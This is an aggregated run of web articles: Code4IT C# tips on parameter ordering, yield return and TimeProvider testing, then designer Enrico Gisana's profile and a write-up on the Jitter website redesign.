    • Pinterest
    • Marvelous Designer
    • Spline Tool
    • PeachWeb

    Final Thoughts

    Life is short—know your limits and your worth. Set non-negotiable boundaries with anything or anyone that drags you down: no second chances, no comebacks. Be good to people and to the world, but also be selfish in the best way—do what makes you feel alive, happy, and full of magic. Surround yourself with people who are worth your attention, who value you as much as you value them.

    Put yourself in the main role of your own life, dream big, and be grateful to be here.

    LOVE!

    Contact

    Thanks a lot for taking the time to read about me!

    Let’s connect!

    Instagram
    X (Twitter)
    LinkedIn
    Email for new inquiries: hello@celialopez.fr 💌





    Source link

  • Keep the parameters in a consistent order &vert; Code4IT

    Keep the parameters in a consistent order | Code4IT


    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    If you have a set of related functions, use always a coherent order of parameters.

    Take this bad example:

    IEnumerable<Section> GetSections(Context context);
    
    void AddSectionToContext(Context context, Section newSection);
    
    void AddSectionsToContext(IEnumerable<Section> newSections, Context context);
    

    Notice the order of the parameters passed to AddSectionToContext and AddSectionsToContext: they are swapped!

    Quite confusing, isn’t it?

    Confusion intensifies

    For sure, the code is harder to understand, since the order of the parameters is not what the reader expects it to be.

    But, even worse, this issue may lead to hard-to-find bugs, especially when parameters are of the same type.

    Think of this example:

    IEnumerable<Item> GetPhotos(string type, string country);
    
    IEnumerable<Item> GetVideos(string country, string type);
    

    Well, what could possibly go wrong?!?

    We have two ways to prevent possible issues:

    1. use coherent order: for instance, type is always the first parameter
    2. pass objects instead: you’ll add a bit more code, but you’ll prevent those issues

    To read more about this code smell, check out this article by Maxi Contieri!

    This article first appeared on Code4IT

    Conclusion

    To recap, always pay attention to the order of the parameters!

    • keep them always in the same order
    • use easy-to-understand order (remember the Principle of Least Surprise?)
    • use objects instead, if necessary.

    👉 Let’s discuss it on Twitter or in the comment section below!

    🐧





    Source link

  • use yield return to return one item at the time &vert; Code4IT

    use yield return to return one item at the time | Code4IT


    Yield is a keyword that allows you to return an item at the time instead of creating a full list and returning it as a whole.

    Table of Contents

    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    To me, yield return has always been one of the most difficult things to understand.

    Now that I’ve understood it (not thoroughly, but enough to explain it), it’s my turn to share my learnings.

    So, what does yield return mean? How is it related to collections of items?

    Using Lists

    Say that you’re returning a collection of items and that you need to iterate over them.

    A first approach could be creating a list with all the items, returning it to the caller, and iterating over the collection:

    IEnumerable<int> WithList()
    {
        List<int> items = new List<int>();
    
        for (int i = 0; i < 10; i++)
        {
            Console.WriteLine($"Added item {i}");
            items.Add(i);
        }
    
        return items;
    }
    
    void Main()
    {
        var items = WithList();
    
        foreach (var i in items)
        {
            Console.WriteLine($"This is Mambo number {i}");
        }
    }
    

    This snippet creates the whole collection and then prints the values inside that list. On the console, you’ll see this text:

    Added item 0
    Added item 1
    Added item 2
    Added item 3
    Added item 4
    Added item 5
    Added item 6
    Added item 7
    Added item 8
    Added item 9
    This is Mambo number 0
    This is Mambo number 1
    This is Mambo number 2
    This is Mambo number 3
    This is Mambo number 4
    This is Mambo number 5
    This is Mambo number 6
    This is Mambo number 7
    This is Mambo number 8
    This is Mambo number 9
    

    This means that, if you need to operate over a collection with 1 million items, at first you’ll create ALL the items, and then you’ll perform operations on each of them. This approach has two main disadvantages: it’s slow (especially if you only need to work with a subset of those items), and occupies a lot of memory.

    With Yield

    We can use another approach: use the yield return keywords:

    IEnumerable<int> WithYield()
    {
        for (int i = 0; i < 10; i++)
        {
            Console.WriteLine($"Returning item {i}");
    
            yield return i;
        }
    }
    
    void Main()
    {
        var items = WithYield();
    
        foreach (var i in items)
        {
            Console.WriteLine($"This is Mambo number {i}");
        }
    }
    

    With this method, the order of messages is different:

    Returning item 0
    This is Mambo number 0
    Returning item 1
    This is Mambo number 1
    Returning item 2
    This is Mambo number 2
    Returning item 3
    This is Mambo number 3
    Returning item 4
    This is Mambo number 4
    Returning item 5
    This is Mambo number 5
    Returning item 6
    This is Mambo number 6
    Returning item 7
    This is Mambo number 7
    Returning item 8
    This is Mambo number 8
    Returning item 9
    This is Mambo number 9
    

    So, instead of creating the whole list, we create one item at a time, and only when needed.

    Benefits of Yield

    As I said before, there are several benefits with yield: the application is more performant when talking about both the execution time and the memory usage.

    It’s like an automatic iterator: every time you get a result, the iterator advances to the next item.

    Just a note: yield works only for methods that return IAsyncEnumerable<T>, IEnumerable<T>, IEnumerable, IEnumerator<T>, or IEnumerator.

    You cannot use it with a method that returns, for instance, List<T>, because, as the error message says,

    The body of X cannot be an iterator block because List<int> is not an iterator interface type

    Cannot use yield return with lists

    A real use case

    If you use NUnit as a test suite, you’ve probably already used this keyword.

    In particular, when using the TestCaseSource attribute, you specify the name of the class that outputs the test cases.

    public class MyTestClass
    {
        [TestCaseSource(typeof(DivideCases))]
        public void DivideTest(int n, int d, int q)
        {
            Assert.AreEqual(q, n / d);
        }
    }
    
    class DivideCases : IEnumerable
    {
        public IEnumerator GetEnumerator()
        {
            yield return new object[] { 12, 3, 4 };
            yield return new object[] { 12, 2, 6 };
            yield return new object[] { 12, 4, 3 };
        }
    }
    

    When executing the tests, an iterator returns a test case at a time, without creating a full list of test cases.

    The previous snippet is taken directly from NUnit’s documentation for the TestCaseSource attribute, that you can find here.

    Wrapping up

    Yes, yield is a quite difficult keyword to understand.

    To read more, head to the official docs.

    Another good resource is “C# – Use yield return to minimize memory usage” by Makolyte. You should definitely check it out!

    And, if you want, check out the conversation I had about this keyword on Twitter.

    Happy coding!

    🐧





    Source link

  • injecting and testing the current time with TimeProvider and FakeTimeProvider &vert; Code4IT

    injecting and testing the current time with TimeProvider and FakeTimeProvider | Code4IT


    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    Things that depend on concrete stuff are difficult to use when testing. Think of the file system: to have tests work properly, you have to ensure that the file system is structured exactly as you are expecting it to be.

    A similar issue occurs with dates: if you create tests based on the current date, they will fail the next time you run them.

    In short, you should find a way to abstract these functionalities, to make them usable in the tests.

    In this article, we are going to focus on the handling of dates: we’ll learn what the TimeProvider class is, how to use it and how to mock it.

    The old way for handling dates: a custom interface

    Back in the days, the most straightforward approach to add abstraction around the date management was to manually create an interface, or an abstract class, to wrap the access to the current date:

    public interface IDateTimeWrapper
    {
      DateTime GetCurrentDate();
    }
    

    Then, the standard implementation implemented the interface by using only the UTC date:

    public class DateTimeWrapper : IDateTimeWrapper
    {
      public DateTime GetCurrentDate() => DateTime.UtcNow;
    }
    

    A similar approach is to have an abstract class instead:

    public abstract class DateTimeWrapper
    {
      public virtual DateTime GetCurrentDate() => DateTime.UctNow;
    }
    

    Easy: you then have to add an instance of it in the DI engine, and you are good to go.

    The only problem? You have to do it for every project you are working on. Quite a waste of time!

    How to use TimeProvider in a .NET application to get the current date

    Along with .NET 8, the .NET team released an abstract class named TimeProvider. This abstract class, beyond providing an abstraction for local time, exposes methods for working with high-precision timestamps and TimeZones.

    It’s important to notice that dates are returned as DateTimeOffset, and not as DateTime instances.

    TimeProvider comes out-of-the-box with a .NET Console application, accessible as a singleton:

    static void Main(string[] args)
    {
      Console.WriteLine("Hello, World!");
      
      DateTimeOffset utc = TimeProvider.System.GetUtcNow();
      Console.WriteLine(utc);
    
      DateTimeOffset local = TimeProvider.System.GetLocalNow();
      Console.WriteLine(local);
    }
    

    On the contrary, if you need to use Dependency Injection, for example, in .NET APIs, you have to inject it as a singleton, like this:

    builder.Services.AddSingleton(TimeProvider.System);
    

    So that you can use it like this:

    public class SummerVacationCalendar
    {
      private readonly TimeProvider _timeProvider;
    
      public SummerVacationCalendar(TimeProvider timeProvider)
     {
        this._timeProvider = timeProvider;
     }
    
      public bool ItsVacationTime()
     {
        var today = _timeProvider.GetLocalNow();
        return today.Month == 8;
     }
    }
    

    How to test TimeProvider with FakeTimeProvider

    Now, how can we test the ItsVacationTime of the SummerVacationCalendar class?

    We can use the Microsoft.Extensions.TimeProvider.Testing NuGet library, still provided by Microsoft, which provides a FakeTimeProvider class that acts as a stub for the TimeProvider abstract class:

    TimeProvider.Testing NuGet package

    By using the FakeTimeProvider class, you can set the current UTC and Local time, as well as configure the other options provided by TimeProvider.

    Here’s an example:

    [Fact]
    public void WhenItsAugust_ShouldReturnTrue()
    {
     // Arrange
      var fakeTime = new FakeTimeProvider();
      fakeTime.SetUtcNow(new DateTimeOffset(2025, 8, 14, 22, 24, 12, TimeSpan.Zero));
      var sut = new SummerVacationCalendar(fakeTime);
    
     // Act
      var isVacation = sut.ItsVacationTime();
    
     // Assert
      Assert.True(isVacation);
    }
    
    [Fact]
    public void WhenItsNotAugust_ShouldReturnFalse()
    {
     // Arrange
      var fakeTime = new FakeTimeProvider();
      fakeTime.SetUtcNow(new DateTimeOffset(2025, 3, 14, 22, 24, 12, TimeSpan.Zero));
      var sut = new SummerVacationCalendar(fakeTime);
    
     // Act
      var isVacation = sut.ItsVacationTime();
    
     // Assert
      Assert.False(isVacation);
    }
    

    Further readings

    Actually, TimeProvider provides way more functionalities than just returning the UTC and the Local time.

    Maybe we’ll explore them in the future. But for now, do you know how the DateTimeKind enumeration impacts the way you create new DateTimes?

    🔗 C# tip: create correct DateTimes with DateTimeKind | Code4IT

    This article first appeared on Code4IT 🐧

    However, always remember to test the code not against the actual time but against static values. But, if for some reason you cannot add TimeProvider in your classes, there are other less-intrusive strategies that you can use (and that can work for other types of dependencies as well, like the file system):

    🔗 3 ways to inject DateTime and test it | Code4IT

    Wrapping up

    I hope you enjoyed this article! Let’s keep in touch on LinkedIn, Twitter or BlueSky! 🤜🤛

    Happy coding!

    🐧





    Source link

  • Design as Rhythm and Rebellion: The Work of Enrico Gisana

    Design as Rhythm and Rebellion: The Work of Enrico Gisana


    My name is Enrico Gisana, and I’m a creative director, graphic and motion designer.

    I’m the co-founder of GG—OFFICE, a small independent visual arts studio based in Modica, Sicily. I consider myself a multidisciplinary designer because I bring together different skills and visual languages. I work across analog and digital media, combining graphic design, typography, and animation, often blending these elements through experimental approaches. My design approach aims to push the boundaries of traditional graphic conventions, constantly questioning established norms to explore new visual possibilities.

    My work mainly focuses on branding, typography, and motion design, with a particular emphasis on kinetic typography.

    Between 2017 and 2025, I led numerous graphic and motion design workshops at various universities and art academies in Italy, including Abadir (Catania), Accademia di Belle Arti di Frosinone, Accademia di Belle Arti di Roma, CFP Bauer (Milan), and UNIRSM (San Marino). Since 2020, I’ve been teaching motion design at Abadir Academy in Catania, and since 2025, kinetic typography at CFP Bauer in Milan.

    Featured work

    TYPEXCEL — Variable font

    I designed an online half-day workshop for high school students on the occasion of an open day at the Academy of Design and Visual Communication Abadir, held in 2021.

    The goal of this workshop was to create a first contact with graphic design, but most of all with typography, using an Excel spreadsheet as a modular grid composed of editable and variable cells, instead of professional software which requires specific knowledge.

    The cell pattern allowed the students to create letters, icons, and glyphs. It was a stimulating exercise that helped them discover and develop their own design and creative skills.

    This project was published in Slanted Magazine N°40 “Experimental Type”.

    DEMO Festival

    DEMO Festival (Design in Motion Festival) is one of the world’s most prominent motion design festivals, founded by the renowned Dutch studio Studio Dumbar. The festival takes over the entire digital screen network of Amsterdam Central Station, transforming public space into a 24-hour exhibition of cutting-edge motion work from around the globe.

    I’ve had the honor of being selected multiple times to showcase my work at DEMO: in 2019 with EYE SEQUENCE; in 2022 with ALIEN TYPE and VERTICAL; and again in 2025 with ALIEN TRIBE, HELLOCIAOHALLOSALUTHOLA, and FREE JAZZ.

    In the 2025 edition, ALIEN TRIBE and HELLOCIAOHALLOSALUTHOLA were also selected for the Special Screens program, which extended the festival’s presence beyond the Netherlands. These works were exhibited in digital spaces across cities including Eindhoven, Rotterdam, Tilburg, Utrecht, Hamburg, and Düsseldorf, reaching a broader international audience.

    MARCO FORMENTINI

    My collaboration with Italian footwear designer Marco Formentini, based in Amsterdam, began with the creation of his visual identity and gradually expanded into other areas, including apparel experiments and the design of his personal website.

    Each phase of the project reflects his eclectic and process-driven approach to design, while also allowing me to explore form, texture, and narrative through different media.

    Below is a closer look at the three main outputs of this collaboration: logo, t-shirt, and website.

    Logo

    Designed for Italian footwear designer Marco Formentini, this logo reflects his broad, exploratory approach to design. Rather than sticking to a traditional monogram, I fused the letters “M” and “F” into a single, abstract shape, something that feels more like a symbol than a set of initials. The result is a wild, otherworldly mark that evokes movement, edge, and invention, mirroring Marco’s ability to shift across styles and scales while always keeping his own perspective.

    Website

    I conceived Marco Formentini’s website as a container, a digital portfolio without a fixed structure. It gathers images, sketches, prototypes, and renderings not through a linear narrative but through a visual flow that embraces randomness.

    The layout is split into two vertical columns, each filled with different types of visual content. By moving the cursor left or right, the columns dynamically resize, allowing the user to shift focus and explore the material in an intuitive and fluid way. This interactive system reflects Marco’s eclectic approach to footwear design, a space where experimentation and process take visual form.

    Website development by Marco Buccolo.

    Check it out: marco-formentini.com

    T—Shirt

    Shortly after working on his personal brand, I shared with Marco Formentini a few early graphic proposals for a potential t-shirt design, while he happened to be traveling through the Philippines with his friend Jo.

    Without waiting for a full release, he spontaneously had a few pieces printed at a local shop he stumbled upon during the trip, mixing one of the designs on the front with a different proposal on the back. An unexpected real-world test run for the identity, worn into the streets before even hitting the studio.

    Ditroit

    This poster was created to celebrate the 15th anniversary of Ditroit, a motion design and 3D studio based in Milan.

    At the center is an expressive “15”, a tribute to the studio’s founder, a longtime friend and former graffiti companion. The design reconnects the present with our shared creative roots and the formative energy of those early years.

    Silver on black: a color pairing rooted in our early graffiti experiments, reimagined here to celebrate fifteen years of visual exploration.

    Tightype

    A series of typographic animations I created for the launch of Habitas, the typeface designed by Tightype and released in 2021.

    The project explores type in motion, not just as a vehicle for content but as a form of visual expression in itself. Shapes bounce, rotate and multiply, revealing the personality of the font through rhythm and movement.

    Jane Machine

    SH SH SH SH is the latest LP from Jane Machine.

    The cover is defined by the central element of the lips, directly inspired by the album’s title. The lips not only mimic the movement of the “sh” sound but also evoke the noise of tearing paper. I amplified this effect through the creative process by first printing a photograph of the lips and then tearing it, introducing a tactile quality that contrasts with and complements the more electronic aesthetic of the colors and typography.

    Background

    I’m a creative director and graphic & motion designer with a strong focus on typography.

    My visual journey started around the age of 12, shaped by underground culture: I was into graffiti, hip hop, breakdancing, and skateboarding.

    As I grew up, I explored other scenes, from punk to tekno, from drum and bass to more experimental electronic music. What always drew me in, beyond the music itself, was the visual world around it: free party flyers, record sleeves, logos, and type everywhere.

    Between 2004 and 2010, I produced tekno music, an experience that deeply shaped my approach to design. That’s where I first learned about timelines, beats, and rhythm, all elements that today are at the core of how I work with motion.

    Art has also played a major role in shaping my visual culture, from the primitive signs of hieroglyphs to Cubism, Dadaism, Russian Constructivism, and the expressive intensity of Antonio Ligabue.

    The aesthetics and attitude of those worlds continue to influence everything I do and how I see things.

    In 2013, I graduated in Graphic Design from IED Milano and started working with various agencies. In 2014, I moved back to Modica, Sicily, where I’m still based today.

    Some of my animation work has been featured at DEMO Festival, the international motion design event curated by Studio Dumbar, in the 2019, 2022, and 2025 editions.

    In 2022, I was published in Slanted Magazine #40 (EXPERIMENTAL TYPE) with TYPEXCEL, Variable font, a project developed for a typography workshop aimed at high school students, entirely built inside an Excel spreadsheet.

    Since 2020, I’ve been teaching Motion Design at Abadir, Academy of Design and Visual Communication in Catania, and in 2025 I started teaching Type in Motion at Bauer in Milan.

    In 2021, together with Francesca Giampiccolo, I founded GG—OFFICE, a small independent visual studio based in Modica, Sicily.

    GG—OFFICE is a design space where branding and motion meet through a tailored and experimental approach. Every project grows from dialogue, evolves through research, and aims to shape contemporary, honest, and visually forward identities.

    In 2025, Francesca and I gave a talk on the theme of madness at Desina Festival in Naples, a wild, fun, and beautifully chaotic experience.

    Design Philosophy

    My approach to design is rooted in thought, I think a lot, as well as in research, rhythm, and an almost obsessive production of drafts.

    Every project is a unique journey where form always follows meaning, and never simply does what the client says.

    This is not about being contrary; it’s about bringing depth, intention and a point of view to the process.

    I channel the raw energy and DIY mindset of the subcultures that shaped me early on. I’m referring to those gritty, visual sound-driven scenes that pushed boundaries and blurred the line between image and sound. I’m not talking about the music itself, but about the visual culture that surrounded it. That spirit still fuels my creative engine today.

    Typography is my playground, not just a visual tool but a way to express structure, rhythm and movement.

    Sometimes I push letterforms to their limit, to the point where they lose readability and become pure visual matter.

    Whether I’m building a brand identity or animating graphics, I’m always exploring new visual languages, narrative rhythms and spatial poetry.

    Tools and Techniques

    I work across analog and digital tools, but most of my design and animation takes shape in Adobe Illustrator, After Effects, InDesign and Photoshop. And sometimes even Excel 🙂 especially when I want to break the rules and rethink typography in unconventional ways.

    I’m drawn to processes that allow for exploration and controlled chaos. I love building visual systems, breaking them apart and reconstructing them with intention.

    Typography, to me, is a living structure, modular, dynamic and often influenced by visual or musical rhythm.

    My workflow starts with in-depth research and a large amount of hand sketching.

    I then digitize the material, print it, manipulate it manually by cutting, collaging and intervening physically, then scan it again and bring it back into the digital space.

    This back-and-forth between mediums helps me achieve a material quality and a sense of imperfection that pure digital work often lacks.

    Inspiration

    Beyond the underground scenes and art movements I mentioned earlier, my inspiration comes from everything around me. I’m a keen observer and deeply analytical. Since I was a kid, I’ve been fascinated by people’s gestures, movements, and subtle expressions.

    For example, when I used to go to parties, I would often stand next to the DJ, not just to watch their technique, but to study their body language, movements, and micro-expressions. Even the smallest gesture can spark an idea.

    I believe inspiration is everywhere. It’s about being present and training your eye to notice the details most people overlook.

    Future Goals

    I don’t have a specific goal or destination. My main aim is to keep doing things well and to never lose my curiosity. For me, curiosity is the fuel that drives creativity and growth, so I want to stay open, keep exploring, and enjoy the process without forcing a fixed outcome.

    Message to Readers

    Design is not art!

    Design is method, planning, and process. However, that method can, and sometimes should, be challenged, as long as you remain fully aware of what you are doing. It is essential that what you create can be reproduced consistently and, depending on the project, works effectively across different media and formats. I always tell my students that you need to know the rules before you can break them. To do good design, you need a lot of passion and a lot of patience.

    Contact



    Source link

  • A Behind-the-Scenes Look at the New Jitter Website

    A Behind-the-Scenes Look at the New Jitter Website



    If Jitter isn’t on your radar yet, it’s a motion design tool for creative teams that makes creating animated content, from social media assets and ads to product animations and interface mockups, easy and fun.

    Think of it as Figma meets After Effects: intuitive, collaborative, and built for designers who want to bring motion into their workflows without the steep learning curve of traditional tools.

    Why We Redesigned Our Website

    Our previous site had served us well, but it also remained mostly unchanged since we launched Jitter nearly two years ago. The old website focused heavily on the product’s features, but didn’t really communicate its value and use cases. In 2025, we decided it was time for a full refresh.

    The main goal? Not just to highlight what Jitter does, but articulate why it changes the game for motion design.

    We’ve had hundreds of conversations with creative professionals, from freelancers and brand designers to agencies and startups, and heard four key benefits mentioned consistently:

    1. Ease of use
    2. Creativity
    3. Speed
    4. Collaboration

    These became the pillars of the new site experience.

    We also wanted to make room for growth: a more cohesive brand, better storytelling, real-world customer examples, and educational content to help teams get the most out of Jitter.

    Another major shift was in our audience. The first version of the website was speaking to every designer, highlighting simplicity and familiarity. But as the product evolved, it became clear that Jitter shines the most when used collaboratively across teams. The new website reflects that focus.

    Shaping Our Positioning

    We didn’t define our “how, what, and why” in isolation. Throughout 2024, we spoke to dozens of creative teams, studios, and design leaders, and listened closely.

    We used this ongoing feedback to shape the way we talk about Jitter ourselves: which problems it solves, where it fits in the design workflow, and why teams love it. The new website is a direct result of that research.

    At the same time, we didn’t want Jitter to feel too serious or corporate. Even though it’s built for teams, we aimed to keep the brand light, fun, and relatable. Motion design should be exciting, not intimidating, and we wanted that to come through in the way Jitter sounds and feels.

    Designing With Jitter

    We also walked the talk, using Jitter to design all animations and prototype every interaction across the new site.

    From menu transitions to the way cards animate on scroll, all micro-interactions were designed in Jitter. It gave us speed, clarity, and a single source of truth, and eliminated a lot of the back-and-forth in the handoff process.

    Our development partners at Antinomy Studio and Ingamana used Jitter too. They prototyped transitions and UI motion directly in the tool to validate ideas and communicate back to our team. It was great to see developers using motion as a shared language, not a handoff artifact.

    Building Together with Antinomy Studio

    The development of the new site was handled in collaboration with the talented team at Antinomy Studio.

    The biggest technical challenge was the large horizontal scroll experience on the homepage. It needed to feel natural, responsive, and smooth across devices, and maintain high performance without compromising on the visuals.

    The site was built using React and GSAP for complex, timeline-based animations and transitions.

    “The large horizontal scroll was particularly complicated and required significant responsive changes. Instead of defining overly complex timelines where screen width values would change the logic of the animation in JavaScript, we used progress values as CSS variables. This allowed us to use calc() functions to translate and scale elements, while the GSAP timeline only updates values from 0 to 1. So easy to understand and maintain!

    — Baptiste Briel, Antinomy

    We’ve promoted the use of CSS as much as possible for high performances hover effects and transitions. We’ve even used the new linear() easing functions to bring a bouncy feeling to our CSS animations.

    There’s a great tool created by Jake Archibald on generating spring-like CSS easing functions that you can paste as CSS variables. It’s so much fun to play with, and it’s also something that the Jitter team has implemented in their software, so it was super easy to review and tweak for both design and engineering teams.

    Jitter animations were exported as Lottie files and integrated directly, making the experience dynamic and lightweight. It’s a modern stack that supports our need for speed and flexibility, both in the frontend and behind the scenes.

    — Baptiste Briel, Antinomy

    What We Learned

    This redesign taught us a few valuable lessons:

    • Start with benefits, not features. Users don’t care what your product does until they understand how it can help them.
    • Design with your real audience in mind. Jitter for solo designers and Jitter for teams are two different stories. Clarifying our audience helped us craft a stronger, clearer narrative.
    • Prototyping with Jitter helped us move faster, iterate more confidently, and keep design and development in sync.

    We’ve already seen an impact: a sharper brand perception, higher engagement and conversion across all pages, and a new wave of qualified inbound leads from the best brands in the world, including Microsoft, Dropbox, Anthropic, Lyft, Workday, United Airlines, and more. And this is just the beginning.

    What’s Next?

    We see our new website as a constantly evolving platform. In the coming months, we’ll be adding more:

    • Case studies and customer stories
    • Use case pages
    • Learning resources and motion design tutorials
    • Playful experiments and interactive demos

    Our mission remains the same: to make motion design accessible, collaborative, and fun. Our website is now better equipped to carry that message forward.

    Let us know what you think, and if there’s anything you’d love to see next.

    Thanks for reading, and stay in motion 🚀

    Give Jitter a Try

    Get started with Jitter for free and explore 300+ free templates to jumpstart your next project. Once you’re ready to upgrade, get 25% off the first year of paid annual plans with JITTERCODROPS25.



    Source link